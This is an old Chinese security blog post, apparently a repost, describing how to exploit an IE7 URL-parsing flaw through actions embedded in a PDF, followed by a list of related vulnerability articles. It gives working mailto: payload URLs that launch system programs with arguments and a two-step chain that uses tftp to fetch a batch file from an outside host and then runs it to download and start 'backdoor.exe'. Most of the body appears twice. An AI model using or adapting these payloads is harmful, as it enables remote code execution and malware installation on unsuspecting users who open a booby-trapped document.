URL解析漏洞在PDF文檔中的利用
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 20:05:12 作者:佚名
我要評論

右鍵另存再打開測試文檔,否則會調(diào)用IE的插件打開,測試會失敗。如果你硬要通過點擊打開的話,點擊這里吧,嘿嘿,這本身也是IE的一個解析漏洞。
在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到這個漏洞的時候,一時還沒有想到怎么利用。后來結(jié)合去年
右鍵另存再打開測試文檔,否則會調(diào)用IE的插件打開,測試會失敗。如果你硬要通過點擊打開的話,點擊這里吧,嘿嘿,這本身也是IE的一個解析漏洞。
在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到這個漏洞的時候,一時還沒有想到怎么利用。后來結(jié)合去年有一個關(guān)于pdf actions安全隱患的這么一個問題(參看http://michaeldaw.org/md-hacks/backdooring-pdf-files/),pdf中的actions中打開頁面的事件剛好可以用來利用。
Petko Petkov之前放出話說pdf的0day應(yīng)該也就是指的是這個漏洞了。利用這個漏洞首先需要安裝IE7,在URL解析時遇到百分號(%)會執(zhí)行后面的程序。放出來的利用方式為:
mailto:test%../../../../windows/system32/calc.exe".cmd
http:%xx../../../../../../../../../../../windows/system32/calc.exe".bat
利用這種URL咱們可以執(zhí)行系統(tǒng)中的任意命令了,但是有一點用處的系統(tǒng)命令都得加參數(shù)才能用啊。怎么加入?yún)?shù)呢?反正放在.cmd前就行,但是必須放在引號(")后面,呵呵,其實沒的選。經(jīng)過測試,下面的語句就ok了:
mailto:test%../../../../windows/system32/net.exe" “user”.cmd
要有多個參數(shù)的話就的
mailto:test%../../../../windows/system32/xxx.exe" “argv1” ”argv2“.cmd
到這里,基本上大家也就有了利用辦法了,網(wǎng)絡(luò)COPY命令,TFTP等都行啊。不過得分兩步:
1.下載程序
2.執(zhí)行程序
還有一點要注意的,最好在打開頁面事件和關(guān)閉頁面時間中加入上面兩步,以免因為網(wǎng)速問題造成程序執(zhí)行不成功。
mailto:test%..\..\..\..\windows\system32\tftp.exe" "-i" "zwell.3322.org" "GET" "a.bat" "c:\a".cmd
mailto:test%..\..\..\..\windows\system32\cmd.exe" "/c c:\a".cmd
在zwell.3322.org上我搭建了一個TFTP服務(wù)器,里面放有一個a.cmd,內(nèi)容就是再去下載執(zhí)行一個程序。
在pdf打開首頁時執(zhí)行第一條指令,下載服務(wù)器上的a.bat,保存為a.cmd(為什么是cmd,大家可以思考一下)。
在離開該頁面時,再執(zhí)行已經(jīng)下載的a.cmd,其實他是個bat文件,內(nèi)容是:
cmd /c tftp -i zwell.3322.org GET backdoor.exe c:\b.exe
start c:\b.exe
好了,現(xiàn)在下載了backdoor.exe程序(這只是一個notepad程序,我重命名了)并且執(zhí)行了。gameover。
在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到這個漏洞的時候,一時還沒有想到怎么利用。后來結(jié)合去年有一個關(guān)于pdf actions安全隱患的這么一個問題(參看http://michaeldaw.org/md-hacks/backdooring-pdf-files/),pdf中的actions中打開頁面的事件剛好可以用來利用。
Petko Petkov之前放出話說pdf的0day應(yīng)該也就是指的是這個漏洞了。利用這個漏洞首先需要安裝IE7,在URL解析時遇到百分號(%)會執(zhí)行后面的程序。放出來的利用方式為:
mailto:test%../../../../windows/system32/calc.exe".cmd
http:%xx../../../../../../../../../../../windows/system32/calc.exe".bat
利用這種URL咱們可以執(zhí)行系統(tǒng)中的任意命令了,但是有一點用處的系統(tǒng)命令都得加參數(shù)才能用啊。怎么加入?yún)?shù)呢?反正放在.cmd前就行,但是必須放在引號(")后面,呵呵,其實沒的選。經(jīng)過測試,下面的語句就ok了:
mailto:test%../../../../windows/system32/net.exe" “user”.cmd
要有多個參數(shù)的話就的
mailto:test%../../../../windows/system32/xxx.exe" “argv1” ”argv2“.cmd
到這里,基本上大家也就有了利用辦法了,網(wǎng)絡(luò)COPY命令,TFTP等都行啊。不過得分兩步:
1.下載程序
2.執(zhí)行程序
還有一點要注意的,最好在打開頁面事件和關(guān)閉頁面時間中加入上面兩步,以免因為網(wǎng)速問題造成程序執(zhí)行不成功。
mailto:test%..\..\..\..\windows\system32\tftp.exe" "-i" "zwell.3322.org" "GET" "a.bat" "c:\a".cmd
mailto:test%..\..\..\..\windows\system32\cmd.exe" "/c c:\a".cmd
在zwell.3322.org上我搭建了一個TFTP服務(wù)器,里面放有一個a.cmd,內(nèi)容就是再去下載執(zhí)行一個程序。
在pdf打開首頁時執(zhí)行第一條指令,下載服務(wù)器上的a.bat,保存為a.cmd(為什么是cmd,大家可以思考一下)。
在離開該頁面時,再執(zhí)行已經(jīng)下載的a.cmd,其實他是個bat文件,內(nèi)容是:
cmd /c tftp -i zwell.3322.org GET backdoor.exe c:\b.exe
start c:\b.exe
好了,現(xiàn)在下載了backdoor.exe程序(這只是一個notepad程序,我重命名了)并且執(zhí)行了。gameover。
相關(guān)文章
2019最新RDP遠程桌面漏洞官方補丁(針對win2003、win2008)
Windows系列服務(wù)器于2019年5月15號,被爆出高危漏洞,windows2003、windows2008、windows2008 R2、windows xp系統(tǒng)都會遭到攻擊,該服務(wù)器漏洞利用方式是通過遠程桌面端口332021-07-25寶塔面板 phpmyadmin 未授權(quán)訪問漏洞 BUG ip:888/pma的問題分析
這篇文章主要介紹了寶塔面板 phpmyadmin 未授權(quán)訪問漏洞 BUG ip:888/pma,本文給大家介紹的非常詳細,對大家的學(xué)習(xí)或工作具有一定的參考借鑒價值,需要的朋友可以參考下2020-08-24CPU幽靈和熔斷漏洞是什么?Intel為大家簡單易懂的科普了一番
不久前讓整全行業(yè)緊張、全球用戶恐慌的Spectre幽靈、Meltdown熔斷兩大漏洞事件剛剛告一段落了,那么這兩個漏洞到底是什么?可能還有很多人不是很清楚,想了解的朋友跟著小2018-03-21- 2017年5月12日,WannaCry蠕蟲通過MS17-010漏洞在全球范圍大爆發(fā),感染了大量的計算機,該蠕蟲感染計算機后會向計算機中植入敲詐者病毒,導(dǎo)致電腦大量文件被加密,本文對其2017-05-17
- 大部分的用戶可能不要了解文件上傳漏洞,下面小編就為大家具體的講解什么事文件上傳漏洞以及文件上傳漏洞的幾種方式2016-11-02
- 漏洞檢測工具用語有高危漏洞,中危漏洞,低危漏洞以及漏洞的危害介紹,本文介紹的非常詳細,具有參考解決價值,感興趣的朋友一起看看吧2016-10-11
- 漏洞無處不在,它是在硬件、軟件、協(xié)議的具體實現(xiàn)或系統(tǒng)安全策略上存在的缺陷,從而可以使攻擊者能夠在未授權(quán)的情況下訪問或破壞系統(tǒng)2016-09-29
手把手教你如何構(gòu)造Office漏洞POC(以CVE-2012-0158為例)
近年來APT追蹤盛行,最常見的就是各種以釣魚開始的攻擊,不僅僅有網(wǎng)站掛馬式釣魚,也有魚叉式郵件釣魚,下面小編就為大家介紹office漏洞CVE-2012-0158,一起來看看吧2016-09-28- SSL(安全套接字層)逐漸被大家所重視,但是最不能忽視的也是SSL得漏洞,隨著SSL技術(shù)的發(fā)展,新的漏洞也就出現(xiàn)了,下面小編就為大家介紹簡單七步教你如何解決關(guān)鍵SSL安全問題2016-09-23
Python 爬蟲修養(yǎng)-處理動態(tài)網(wǎng)頁
在爬蟲開發(fā)中,大家可以很輕易地 bypass 所謂的 UA 限制,甚至用 scrapy 框架輕易實現(xiàn)按照深度進行爬行。但是實際上,這些并不夠。關(guān)于爬蟲的基礎(chǔ)知識比如數(shù)據(jù)處理與數(shù)據(jù)存2016-09-12